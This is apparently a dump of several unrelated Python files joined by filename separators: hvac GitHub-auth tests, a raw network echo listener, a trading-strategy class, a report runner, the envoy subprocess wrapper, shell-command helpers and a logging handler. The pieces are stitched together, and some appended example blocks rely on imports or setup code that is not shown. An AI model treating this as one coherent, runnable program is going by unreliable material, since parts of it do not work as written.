def test_map_team_and_read_mapping(self, test_label, expected_status_code, team_name, policies, raises=False, exception_msg=''):
if raises:
with self.assertRaises(raises) as cm:
self.client.auth.github.map_team(
team_name=team_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member=exception_msg,
container=str(cm.exception),
)
else:
response = self.client.auth.github.map_team(
team_name=team_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
response = self.client.auth.github.read_team_mapping(
team_name=team_name,
mount_point=self.TEST_GITHUB_PATH,
)
if policies is None:
expected_policies = ''
else:
expected_policies = ','.join(policies)
self.assertDictEqual(
d1=dict(key=team_name, value=expected_policies),
d2=response['data'],
)
@parameterized.expand([
("no policies", 204, 'hvac-user', None),
("with policies", 204, 'hvac-user', ['default']),
])
    def test_map_user(self, test_label, expected_status_code, user_name, policies):
response = self.client.auth.github.map_user(
user_name=user_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
def test_read_user_mapping(self):
response = self.client.auth.github.read_user_mapping(
user_name='hvac',
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member='data',
container=response,
)
@parameterized.expand([
("no policies", 204, 'hvac', None),
("with policy", 204, 'hvac', ['default']),
("with policy incorrect type", 204, 'hvac', 'default, root', exceptions.ParamValidationError, "unsupported policies argument provided"),
("with policies", 204, 'hvac', ['default', 'root']),
])
def test_map_user_and_read_mapping(self, test_label, expected_status_code, user_name, policies, raises=False, exception_msg=''):
if raises:
with self.assertRaises(raises) as cm:
self.client.auth.github.map_user(
user_name=user_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member=exception_msg,
container=str(cm.exception),
)
else:
response = self.client.auth.github.map_user(
user_name=user_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
response = self.client.auth.github.read_user_mapping(
user_name=user_name,
mount_point=self.TEST_GITHUB_PATH,
)
if policies is None:
expected_policies = ''
else:
expected_policies = ','.join(policies)
self.assertDictEqual(
d1=dict(key=user_name, value=expected_policies),
d2=response['data'],
)
@parameterized.expand([
("valid token", 'valid-token', None, None),
("invalid token not in org", "invalid-token", exceptions.InvalidRequest, 'user is not part of required org'),
])
def test_login(self, test_label, test_token, exceptions_raised, exception_msg):
self.client.auth.github.configure(
organization='hvac',
base_url='http://localhost:{port}/'.format(port=self.mock_server_port),
mount_point=self.TEST_GITHUB_PATH,
)
if exceptions_raised is None:
self.client.auth.github.login(
token=test_token,
mount_point=self.TEST_GITHUB_PATH,
)
else:
with self.assertRaises(exceptions_raised) as cm:
self.client.auth.github.login(
token=test_token,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member=exception_msg,
container=str(cm.exception)
)
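# A minimal, standalone sketch of the mock-server pattern used in setUpClass
# above: an HTTPServer served from a daemon thread so it shuts down with the
# main process. The handler and response below are illustrative only and are
# not part of the hvac test suite.
if __name__ == '__main__':
    try:
        from http.server import BaseHTTPRequestHandler
    except ImportError:
        from BaseHTTPServer import BaseHTTPRequestHandler
    class EchoHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b'ok')
    server = HTTPServer(('localhost', 0), EchoHandler)  # port 0 picks a free port
    server_thread = Thread(target=server.serve_forever)
    server_thread.setDaemon(True)
    server_thread.start()
    print('mock server listening on port %d' % server.server_port)
    server.shutdown()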
|
RawListener.py
|
import logging
import os
import sys
import threading
import SocketServer
import ssl
import socket
class RawListener():
def __init__(self, config, name = 'RawListener', logging_level = logging.INFO):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = '0.0.0.0'
self.server = None
self.logger.info('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
def start(self):
# Start listener
if self.config.get('protocol') != None:
if self.config['protocol'].lower() == 'tcp':
self.logger.debug('Starting TCP ...')
self.server = ThreadedTCPServer((self.local_ip, int(self.config['port'])), ThreadedTCPRequestHandler)
elif self.config['protocol'].lower() == 'udp':
self.logger.debug('Starting UDP ...')
self.server = ThreadedUDPServer((self.local_ip, int(self.config['port'])), ThreadedUDPRequestHandler)
else:
self.logger.error('Unknown protocol %s', self.config['protocol'])
return
else:
self.logger.error('Protocol is not defined.')
return
self.server.logger = self.logger
self.server.config = self.config
if self.config.get('usessl') == 'Yes':
self.logger.debug('Using SSL socket.')
keyfile_path = 'privkey.pem'
if not os.path.exists(keyfile_path):
keyfile_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), keyfile_path)
if not os.path.exists(keyfile_path):
self.logger.error('Could not locate privkey.pem')
sys.exit(1)
certfile_path = 'server.pem'
if not os.path.exists(certfile_path):
certfile_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), certfile_path)
if not os.path.exists(certfile_path):
                    self.logger.error('Could not locate server.pem')
sys.exit(1)
self.server.socket = ssl.wrap_socket(self.server.socket, keyfile=keyfile_path, certfile=certfile_path, server_side=True, ciphers='RSA')
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.debug('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
# Timeout connection to prevent hanging
self.request.settimeout(int(self.server.config.get('timeout', 5)))
try:
while True:
data = self.request.recv(1024)
if not data:
break
self.server.logger.info('Received %d bytes.', len(data))
self.server.logger.info('%s', '-'*80)
for line in hexdump_table(data):
self.server.logger.info(line)
self.server.logger.info('%s', '-'*80,)
self.request.sendall(data)
except socket.timeout:
self.server.logger.warning('Connection timeout')
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception, e:
self.server.logger.error('Error: %s', e)
class ThreadedUDPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
(data,socket) = self.request
if not data:
return
self.server.logger.info('Received %d bytes.', len(data))
self.server.logger.debug('%s', '-'*80,)
for line in hexdump_table(data):
self.server.logger.debug(line)
self.server.logger.debug('%s', '-'*80,)
socket.sendto(data, self.client_address)
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception, e:
self.server.logger.error('Error: %s', e)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
pass
def hexdump_table(data, length=16):
hexdump_lines = []
    for i in range(0, len(data), length):
        chunk = data[i:i+length]
hex_line = ' '.join(["%02X" % ord(b) for b in chunk ] )
ascii_line = ''.join([b if ord(b) > 31 and ord(b) < 127 else '.' for b in chunk ] )
hexdump_lines.append("%04X: %-*s %s" % (i, length*3, hex_line, ascii_line ))
return hexdump_lines
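# Worked example (illustrative): hexdump_table('HELO\n') yields a single line of
# the form "0000: 48 45 4C 4F 0A ...                HELO." -- the byte offset,
# the hex bytes padded to `length` columns, then the printable-ASCII rendering
# with '.' substituted for non-printable bytes.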
###############################################################################
# Testing code
def test(config):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\t[RawListener] Sending request:\n%s" % "HELO\n"
try:
# Connect to server and send data
sock.connect(('localhost', int(config.get('port', 23))))
sock.sendall("HELO\n")
# Receive data from the server and shut down
received = sock.recv(1024)
finally:
sock.close()
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '1337', 'usessl': 'No', 'protocol': 'tcp'}
listener = RawListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
#test(config)
listener.stop()
if __name__ == '__main__':
main()
|
tcp_server.py
|
import socket
import sys
import time
import threading
def tcplink(sock, addr):
print('Accept new connection from %s:%s...' % addr)
# sock.send(b'Welcome!')
# while True:
data = sock.recv(1024)
print(data)
# time.sleep(1)
# if not data or data.decode('utf-8') == 'exit':
# break
# sock.send(('Hello, %s!' % data.decode('utf-8')).encode('utf-8'))
# sock.close()
# print('Connection from %s:%s closed.' % addr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 2345))
s.listen(5)
while True:
sock, addr = s.accept()
data = sock.recv(1024)
print(data)
# sock.close()
# time.sleep(10)
# while True:
# sock, addr = s.accept()
# # print("accept: " + str(addr))
# t = threading.Thread(target=tcplink, args=(sock, addr))
# t.start()
|
portfolio_base.py
|
from threading import Thread
from queue import Queue
# import simplejson as json
from datetime import datetime
# import re
from .base_strategy import BaseStrategy, logger
from ...markets import market_watcher, market_simulator, position
from ...db.utils import generate_uuid
from ...db.models import Result, Portfolio, Strategy
class PortfolioBase(BaseStrategy):
def __init__(self, default, limits, portfolio, portfolio_id=None, strategy_id=None):
super().__init__(default, limits, portfolio_id, strategy_id)
self.__thread = Thread(target=self.__run)
self.__jobs = Queue()
self.name = portfolio['name']
self.start_date = None
self.end_date = None
self.run_key = generate_uuid()
self.candle_limit = 1000
self.candle_set = None
self.backtest = False
self.action = 'hold'
if 'start' in default:
self.start_date = default['start']
if 'end' in default:
self.end_date = default['end']
def __del__(self):
self._session.close()
def add_session(self, session):
self.session = session
self.market.add_session(session)
self.init_data()
self.check_if_restarted()
def init_data(self):
self._session = self.session()
if self.portfolio_id is not None:
self.portfolio = self._session.query(Portfolio).filter(Portfolio.id == self.portfolio_id).first()
if self.strategy_id is not None:
self.strategy = self._session.query(Strategy).filter(Strategy.id == self.strategy_id).first()
self._session.close()
def process_limits(self, limits):
self.capital_base = limits['capital_base']
self.order_quantity = limits['order_quantity']
self.position_limit = limits['position_limit']
self.profit_target_percentage = limits['profit_target_percentage']
self.fixed_stoploss_percentage = limits['fixed_stoploss_percentage']
self.trailing_stoploss_percentage = limits['trailing_stoploss_percentage']
def start(self):
"""Start thread and subscribe to candle updates"""
self.__jobs.put(lambda: market_watcher.subscribe(self.market.exchange.id, self.market.base_currency, self.market.quote_currency, self.interval, self.__update, self.session, self.ticker))
self.__thread.start()
def run_simulation(self):
"""Queue simulation when market data has been synced"""
if self.is_simulated:
market_watcher.subscribe_historical(self.market.exchange.id, self.market.base_currency,
self.market.quote_currency, self.interval, self.__run_simulation, self.session, self.ticker)
def check_if_restarted(self):
# TODO: If not simulated append to results and sync positions
pass
def run_backtest(self):
"""Queue simulation when market data has been synced"""
if self.backtest:
market_watcher.subscribe_backtest(self.market.exchange.id, self.market.base_currency,
self.market.quote_currency, self.interval, self.__run_backtest, self.session, self.ticker)
def __run_backtest(self):
def run_backtest():
if self.start_date is None:
print('backtest needs parameters')
return None
if self.end_date is None:
today = datetime.now()
self.end_date = today.strftime('%Y-%m-%d')
candle_set = self.market.get_candle_date_range(
self.interval,
self.start_date,
self.end_date
)
self.backtesting = True
for entry in candle_set:
self.__update(candle=entry)
self.backtesting = False
# TODO: This stops before updating data but something has to work
# It needs to stop itself
# def stop():
# self.stop()
self.__jobs.put(lambda: run_backtest())
# self.__jobs.put(lambda: stop())
def __run_simulation(self, candle_set=None):
"""Start a simulation on historical candles (runs update method on historical candles)"""
def run_simulation(candle_set):
self.add_message("Simulating strategy for market " + self.market.exchange.id + " " + self.market.analysis_pair)
if self.candle_set is not None:
candle_set = self.candle_set
if candle_set is None:
candle_set = self.market.get_historical_candles(self.interval, self.candle_limit)
self.simulating = True
for entry in candle_set:
self.__update(candle=entry)
self.simulating = False
self.__jobs.put(lambda: run_simulation(candle_set))
def __update(self, candle):
"""Run updates on all markets/indicators/signal generators running in strategy"""
def update(candle):
self.add_message("Received new candle")
self.market.update(self.interval, candle)
self.__update_positions()
self.on_data(candle)
self.add_message("Simulation BTC balance: " + str(self.market.get_wallet_balance()))
self._session = self.session()
self.strategy = self._session.query(Strategy).filter(Strategy.id == self.strategy_id).first()
self._session.close()
if self.strategy.status == 'paused':
print('strategy received signal to stop. ID:', self.strategy_id)
self.stop()
# TODO: These should do what they say they do
if self.strategy.status == 'exited':
print('exiting strategy before archiving. ID:', self.strategy_id)
self.stop()
if self.strategy.status == 'archived':
print('setting strategy to archived and stopping. ID:', self.strategy_id)
self.stop()
self.__jobs.put(lambda: update(candle))
def __update_positions(self):
"""Loop through all positions opened by the strategy"""
sell = False
if self.action == 'sell':
sell = True
for p in self.positions:
if p.is_open:
p.update(sell)
# New execute method to handle both buy and sell signals
def execute(self, order_quantity, fixed_stoploss_percent, trailing_stoploss_percent, profit_target_percent, action):
self.action = action
if action == 'buy':
"""Open long position"""
if self.is_simulated:
"""Open simulated long position"""
self.add_message("Going long on " + self.market.analysis_pair)
self.positions.append(market_simulator.open_long_position_simulation(self.market, order_quantity,
self.market.latest_candle[
self.interval][3],
fixed_stoploss_percent,
trailing_stoploss_percent,
profit_target_percent))
else:
"""LIVE long position"""
self.add_message("Going long on " + self.market.analysis_pair)
self.positions.append(position.open_long_position(self.market, order_quantity,
self.market.get_best_ask(),
fixed_stoploss_percent,
trailing_stoploss_percent,
profit_target_percent))
def __run(self):
"""Start the strategy thread waiting for commands"""
self.add_message("Starting strategy " + str(self.strategy_id))
self.running = True
while self.running:
if not self.__jobs.empty():
job = self.__jobs.get()
try:
job()
except Exception as e:
print(e)
logger.error(job.__name__ + " threw error:\n" + str(e))
def add_message(self, msg, type='print'):
if type == 'both' or type == 'print':
# if isinstance(msg, dict):
# str_msg = json.dumps(msg)
# else:
# str_msg = str(msg)
# print(str("Strategy " + str(self.strategy_id) + ": " + str_msg))
# logger.info(str_msg)
pass
if type == 'both' or type == 'db':
data = Result(
strategy_id=self.strategy_id,
run_key=self.run_key,
data=msg
)
self._session = self.session()
self._session.add(data)
self._session.commit()
self._session.close()
# TODO: Do any clean up involved in shutting down
def stop(self):
market_watcher.stop_watcher(self.market.exchange.id, self.market.base_currency, self.market.quote_currency, self.interval)
self.running = False
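# A minimal, standalone sketch (not part of the strategy classes above) of the
# worker pattern used by __run(): callables are pushed onto a Queue and a single
# thread drains and executes them, so candle updates are processed sequentially.
# The busy-wait loop deliberately mirrors the implementation above; imports are
# repeated inside the block so the sketch can be lifted out as-is.
if __name__ == '__main__':
    from queue import Queue
    from threading import Thread
    import time
    jobs = Queue()
    running = True
    def worker():
        while running:
            if not jobs.empty():
                job = jobs.get()
                try:
                    job()
                except Exception as e:
                    print('job failed:', e)
    t = Thread(target=worker)
    t.start()
    jobs.put(lambda: print('processing candle'))
    time.sleep(0.1)
    running = False
    t.join()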
|
report_runner.py
|
import csv
import pandas as pd
import math
import multiprocessing
import os
import shutil
import time
import uuid
from definitions import ROOT_DIR
from multiprocessing import Pool, Manager, Process
from tqdm import tqdm
def write_to_csv(q, csv_file_name, headers, buffer_size=500):
# Create the output files
csv_file = open(f"tmp/{csv_file_name}/{uuid.uuid4()}.csv", "w")
csv_writer = csv.writer(csv_file)
# Write headers
csv_writer.writerow(headers)
output = []
while True:
message = q.get()
if message is None:
if len(output) > 0:
csv_writer.writerows(output)
break
output.append(message)
if len(output) >= buffer_size:
csv_writer.writerows(output)
output = []
class ReportRunner:
def __init__(self, config):
self.turbo_mode = config.turbo_mode
self.preprocessed_content_store_path = config.preprocessed_content_store_path
self.html_content_dir_path = config.html_content_dir_path
self.content_item_batch_size = config.content_item_batch_size
self.csv_writer_buffer_size = config.csv_writer_buffer_size
self.total_content_items = config.total_content_items
self.manager = Manager()
def run(self, report_generators):
print(f"Reading {self.total_content_items} content items from the preprocessed content store...")
preprocessed_content_items = pd.read_csv(self.preprocessed_content_store_path, sep="\t", compression="gzip",
low_memory=False, chunksize=self.total_content_items
)
print("Finished reading from the preprocessed content store!")
preprocessed_content_items = next(preprocessed_content_items)
total_content_items = len(preprocessed_content_items)
print(f"Content item length: {total_content_items}")
num_work, chunksize = self.get_options_for_multiprocessing(total_content_items)
report_generators_with_queues = self.create_report_queues_by_generator(report_generators)
report_writer_processes = self.initialize_report_writers(report_generators_with_queues, num_work)
required_iterations = self.get_iterations_for_batch_size(total_content_items, self.content_item_batch_size)
content_items_iterator = preprocessed_content_items.iterrows()
for iteration in range(0, required_iterations):
print(f"Starting batch {iteration + 1}")
start_time = time.time()
content_item_tuples = self.create_batched_input_for_multiprocessing(content_items_iterator,
report_generators_with_queues,
total_content_items)
print(f"Created batch of {len(content_item_tuples)} tuples")
with Pool(num_work) as pool:
pool.starmap(self.multiprocess_content_items,
[content_item_tuple for content_item_tuple in tqdm(content_item_tuples)],
chunksize=chunksize)
pool.close()
pool.join()
elapsed_time_in_seconds = time.time() - start_time
print(f"Took {elapsed_time_in_seconds}s to process batch {iteration + 1}")
self.finalize_queues_for_report_writers(report_generators_with_queues.values(), num_work)
self.wait_for_report_writers_processes_to_terminate(report_writer_processes)
self.create_reports_from_temporary_files(report_generators)
def create_batched_input_for_multiprocessing(self, content_items_iterator, report_generators_with_queues,
total_content_items):
tuples = []
end_content_item_index = total_content_items - 1
for i in range(0, self.content_item_batch_size):
preprocessed_content_item_tuple = next(content_items_iterator)
tuples.append(
(preprocessed_content_item_tuple[1], self.html_content_dir_path, report_generators_with_queues))
if preprocessed_content_item_tuple[0] == end_content_item_index:
print(f"Reached end of the input file at index {end_content_item_index}")
break
return tuples
def create_report_queues_by_generator(self, report_generators):
queues_by_generator = {}
for generator in report_generators:
report_queue = self.manager.Queue()
queues_by_generator[generator] = report_queue
return queues_by_generator
def initialize_report_writers(self, report_queues_by_generator, number_of_workers_per_report):
report_writer_processes = []
# Create temporary dir for partial CSVs
os.mkdir(os.path.join(ROOT_DIR, 'tmp'))
for generator, queue in report_queues_by_generator.items():
os.mkdir(os.path.join(ROOT_DIR, f"tmp/{generator.filename}"))
# Create a csv writer process for each of the report workers we'll be using for this report
for i in range(number_of_workers_per_report):
report_writer_processes.append(self.initialize_writer_process(write_to_csv, queue, generator.filename,
generator.headers))
return report_writer_processes
def get_options_for_multiprocessing(self, total_content_items):
worker_multiplier = 8 if self.turbo_mode else 0.8
num_work = int(math.ceil(multiprocessing.cpu_count() * worker_multiplier)) # * 8
chunksize, remainder = divmod(total_content_items, num_work)
if remainder:
chunksize += 1
return num_work, chunksize
@staticmethod
def create_reports_from_temporary_files(report_generators):
for report_generator in report_generators:
temporary_dir = os.path.join(ROOT_DIR, f"tmp/{report_generator.filename}")
output_path = os.path.join(ROOT_DIR, f"data/{report_generator.filename}")
csv_dataframes = [pd.read_csv(os.path.join(temporary_dir, temporary_csv))
for temporary_csv in os.listdir(temporary_dir)]
pd.concat(csv_dataframes).sort_values(by=['base_path'])\
.to_csv(output_path, index=False, columns=report_generator.headers)
# Delete temporary dir
shutil.rmtree(os.path.join(ROOT_DIR, 'tmp'))
@staticmethod
def finalize_queues_for_report_writers(queues, number_of_workers_per_report):
for queue in queues:
[queue.put(None) for _i in range(number_of_workers_per_report)]
print("Closing pool for all workers, pushing None value to queue")
@staticmethod
def get_iterations_for_batch_size(total_content_items, batch_size):
return math.ceil(total_content_items / batch_size)
@staticmethod
def initialize_writer_process(target, queue, filename, headers):
process = Process(target=target, args=(queue, filename, headers))
process.daemon = True
process.start()
return process
@staticmethod
def multiprocess_content_items(content_item, base_html_content_path, report_generators):
try:
html_file_path = f"{base_html_content_path}{content_item['base_path']}.html"
with open(html_file_path, "r") as html_file:
html = html_file.read()
for report_generator, queue in report_generators.items():
# Allow the generators to do what they will with the output, rather than saving output here
# This is because a generator might wish to skip certain pages, so we shouldn't mandate an output
# for every page, and we don't want to introduce unnecessary logic here to second-guess what the
# generator may or may not return
result = report_generator.process_page(content_item, html)
                if result and any(result):
queue.put(result)
return
except IOError:
# Couldn't load the path, it could be that the content no longer exists / exists in the preprocessed store
# but didn't exist when the mirror back-ups were created
pass
@staticmethod
def wait_for_report_writers_processes_to_terminate(processes):
for process in processes:
print("Waiting on report writer process to finish")
process.join()
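# Illustrative check (not part of the report pipeline) of the batching arithmetic
# used above: chunksize is ceil(total_items / workers) and the number of batches
# is ceil(total_items / batch_size). The figures below are made up for the example.
if __name__ == '__main__':
    total_items, workers = 1000, 6
    chunksize, remainder = divmod(total_items, workers)
    if remainder:
        chunksize += 1
    print(chunksize)  # -> 167
    print(ReportRunner.get_iterations_for_batch_size(total_items, batch_size=300))  # -> 4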
|
core.py
|
# -*- coding: utf-8 -*-
"""
envoy.core
~~~~~~~~~~
This module provides envoy awesomeness.
"""
import os
import sys
import shlex
import signal
import subprocess
import threading
__version__ = '0.0.2'
__license__ = 'MIT'
__author__ = 'Kenneth Reitz'
def _terminate_process(process):
if sys.platform == 'win32':
import ctypes
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, process.pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
else:
os.kill(process.pid, signal.SIGTERM)
def _kill_process(process):
if sys.platform == 'win32':
_terminate_process(process)
else:
os.kill(process.pid, signal.SIGKILL)
def _is_alive(thread):
if hasattr(thread, "is_alive"):
return thread.is_alive()
else:
return thread.isAlive()
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.out = None
self.err = None
self.returncode = None
self.data = None
self.exc = None
def run(self, data, timeout, kill_timeout, env, cwd):
self.data = data
environ = dict(os.environ)
environ.update(env or {})
def target():
try:
self.process = subprocess.Popen(self.cmd,
universal_newlines=True,
shell=False,
env=environ,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=0,
cwd=cwd,
)
if sys.version_info[0] >= 3:
self.out, self.err = self.process.communicate(
input = bytes(self.data, "UTF-8") if self.data else None
)
else:
self.out, self.err = self.process.communicate(self.data)
except Exception as exc:
self.exc = exc
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if self.exc:
raise self.exc
if _is_alive(thread) :
_terminate_process(self.process)
thread.join(kill_timeout)
if _is_alive(thread):
_kill_process(self.process)
thread.join()
self.returncode = self.process.returncode
return self.out, self.err
class ConnectedCommand(object):
def __init__(self,
process=None,
std_in=None,
std_out=None,
std_err=None):
self._process = process
self.std_in = std_in
self.std_out = std_out
        self.std_err = std_err
self._status_code = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.kill()
@property
def status_code(self):
"""The status code of the process.
If the code is None, assume that it's still running.
"""
return self._status_code
@property
def pid(self):
"""The process' PID."""
return self._process.pid
def kill(self):
"""Kills the process."""
return self._process.kill()
def expect(self, bytes, stream=None):
"""Block until given bytes appear in the stream."""
if stream is None:
stream = self.std_out
def send(self, str, end='\n'):
"""Sends a line to std_in."""
return self._process.stdin.write(str+end)
def block(self):
"""Blocks until command finishes. Returns Response instance."""
self._status_code = self._process.wait()
class Response(object):
"""A command's response"""
def __init__(self, process=None):
super(Response, self).__init__()
self._process = process
self.command = None
self.std_err = None
self.std_out = None
self.status_code = None
self.history = []
def __repr__(self):
if len(self.command):
return '<Response [{0}]>'.format(self.command[0])
else:
return '<Response>'
def expand_args(command):
"""Parses command strings and returns a Popen-ready list."""
# Prepare arguments.
if isinstance(command, str):
splitter = shlex.shlex(command)
splitter.whitespace = '|'
splitter.whitespace_split = True
command = []
while True:
token = splitter.get_token()
if token:
command.append(token)
else:
break
command = list(map(shlex.split, command))
return command
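# Worked example (illustrative): expand_args("ls -la | grep py") returns
# [['ls', '-la'], ['grep', 'py']] -- the string is split on '|' into
# sub-commands, each of which is then tokenised with shlex.split into a
# Popen-ready argument list.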
def run(command, data=None, timeout=None, kill_timeout=None, env=None, cwd=None):
"""Executes a given commmand and returns Response.
Blocks until process is complete, or timeout is reached.
"""
command = expand_args(command)
history = []
for c in command:
if len(history):
# due to broken pipe problems pass only first 10MB
data = history[-1].std_out[0:10*1024]
cmd = Command(c)
out, err = cmd.run(data, timeout, kill_timeout, env, cwd)
r = Response(process=cmd)
r.command = c
r.std_out = out
r.std_err = err
r.status_code = cmd.returncode
history.append(r)
r = history.pop()
r.history = history
return r
def connect(command, data=None, env=None, cwd=None):
"""Spawns a new process from the given command."""
# TODO: support piped commands
command_str = expand_args(command).pop()
environ = dict(os.environ)
environ.update(env or {})
process = subprocess.Popen(command_str,
universal_newlines=True,
shell=False,
env=environ,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=0,
cwd=cwd,
)
return ConnectedCommand(process=process)
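# A quick, illustrative usage sketch of the helpers above (command strings are
# examples and assume a POSIX environment): run() blocks and returns a Response,
# while connect() returns a ConnectedCommand wrapping a live process.
if __name__ == '__main__':
    r = run('echo hello', timeout=5)
    print(r.status_code)  # 0 on success
    print(r.std_out)      # 'hello\n'
    c = connect('sleep 10')
    print(c.pid)
    c.kill()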
|
local_operations.py
|
import os
import pty
import time
import shutil
import threading
import subprocess
from ..utils.constants import Constants
from ..utils.printer import Printer
from ..utils.utils import Utils
class LocalOperations(object):
# ==================================================================================================================
# INIT
# ==================================================================================================================
def __init__(self):
self.printer = Printer()
# ==================================================================================================================
# FILES
# ==================================================================================================================
def file_exist(self, path):
path = Utils.escape_path(path)
return os.path.exists(path)
def file_create(self, path):
path = Utils.escape_path(path)
if not self.file_exist(path):
return os.mknod(path)
def file_delete(self, path):
path = Utils.escape_path(path)
if self.file_exist(path):
return os.remove(path)
# ==================================================================================================================
# DIRECTORIES
# ==================================================================================================================
def dir_exist(self, path):
path = Utils.escape_path(path)
return os.path.exists(path)
def dir_create(self, path):
path = Utils.escape_path(path)
if not self.dir_exist(path):
return os.makedirs(path)
def dir_delete(self, path):
path = Utils.escape_path(path)
if self.dir_exist(path):
shutil.rmtree(path)
# ==================================================================================================================
# COMMANDS
# ==================================================================================================================
def command_subproc_start(self, cmd):
"""Run a command in a subprocess and resume execution immediately."""
self.printer.debug('[LOCAL CMD] Local Subprocess Command: %s' % cmd)
DEVNULL = open(os.devnull, 'w')
proc = subprocess.Popen(cmd.split(), stdout=DEVNULL, stderr=subprocess.STDOUT)
time.sleep(2)
return proc
def command_subproc_stop(self, proc):
"""Stop a running subprocess."""
self.printer.debug('[LOCAL CMD] Stopping Local Subprocess Command [pid: %s]' % proc.pid)
proc.terminate()
def command_blocking(self, cmd):
"""Run a blocking command: wait for its completion before resuming execution."""
self.printer.debug('[LOCAL CMD] Local Command: %s' % cmd)
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout, stderr = proc.stdout.read(), proc.stderr.read()
return stdout, stderr
def command_interactive(self, cmd):
"""Run an interactive command: which requires an interactive shell."""
self.printer.debug("[LOCAL CMD] Local Interactive Command: %s" % cmd)
out = subprocess.call(cmd, shell=True)
return out
def command_background_start(self, cmd):
"""Run a background command: run it in a new thread and resume execution immediately."""
self.printer.debug('[LOCAL CMD] Local Background Command: %s' % cmd)
def daemon(cmd):
"""Daemon used to run the command so to avoid blocking the UI"""
# Run command
master, slave = pty.openpty()
proc = subprocess.Popen(cmd, shell=True, stdout=slave, stderr=slave, close_fds=True)
stdout = os.fdopen(master)
self.printer.info("Monitoring in background...Kill this process when you want to see the dumped content")
# Run command in a thread
d = threading.Thread(name='daemon', target=daemon, args=(cmd,))
d.setDaemon(True)
d.start()
time.sleep(2)
def command_background_stop(self, procname):
"""Stop a running subprocess."""
self.printer.debug('[LOCAL CMD] Stopping Local Background Command')
cmd = 'pgrep {procname} | xargs kill -9'.format(procname=procname)
self.command_blocking(cmd)
# ==================================================================================================================
# LOCAL FILES
# ==================================================================================================================
def build_temp_path_for_file(self, module, fname):
"""Given a filename, returns the full path in the local temp folder."""
return os.path.join(module.path_home_temp, Utils.extract_filename_from_path(fname))
def delete_temp_file(self, module, fname):
"""Given a filename, delete the corresponding file in the local temp folder."""
temp_file = self.build_temp_path_for_file(module, fname)
self.file_delete(temp_file)
def cat_file(self, fname):
"""Given a filename, prints its content on screen."""
cmd = '{bin} {fname}'.format(bin=Constants.PATH_TOOLS_LOCAL['CAT'], fname=fname)
out, err = self.command_blocking(cmd)
self.printer.notify("Content of file '%s': " % fname)
print(out)
# ==================================================================================================================
# NETWORK
# ==================================================================================================================
def get_ip(self):
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('8.8.8.8', 0))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
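# Illustrative usage (commands and paths are examples; the class is normally
# used from within the framework because of the relative imports above):
#
#     ops = LocalOperations()
#     out, err = ops.command_blocking('ls /tmp')
#     proc = ops.command_subproc_start('python -m http.server 8000')
#     ops.command_subproc_stop(proc)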
|
logs_handler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals
import codecs
import logging
import multiprocessing
import os
import re
import sys
import threading
import time
import traceback
from logging.handlers import BaseRotatingHandler, _MIDNIGHT
from stat import ST_MTIME
def register_handler(logger=None):
"""Wraps the handlers in the given Logger with an MultiProcHandler.
:param logger: whose handlers to wrap. By default, the root logger.
"""
if logger is None:
logger = logging.getLogger()
for i, orig_handler in enumerate(list(logger.handlers)):
handler = MultiProcHandler(
'mp-handler-{0}'.format(i), sub_handler=orig_handler
)
logger.removeHandler(orig_handler)
logger.addHandler(handler)
class MultiProcHandler(logging.Handler):
def __init__(self, name, sub_handler=None):
super(MultiProcHandler, self).__init__()
if sub_handler is None:
sub_handler = logging.StreamHandler()
self.sub_handler = sub_handler
self.setLevel(self.sub_handler.level)
self.setFormatter(self.sub_handler.formatter)
self.queue = multiprocessing.Queue(-1)
self._is_closed = False
# The thread handles receiving records asynchronously.
self._receive_thread = threading.Thread(target=self._receive, name=name)
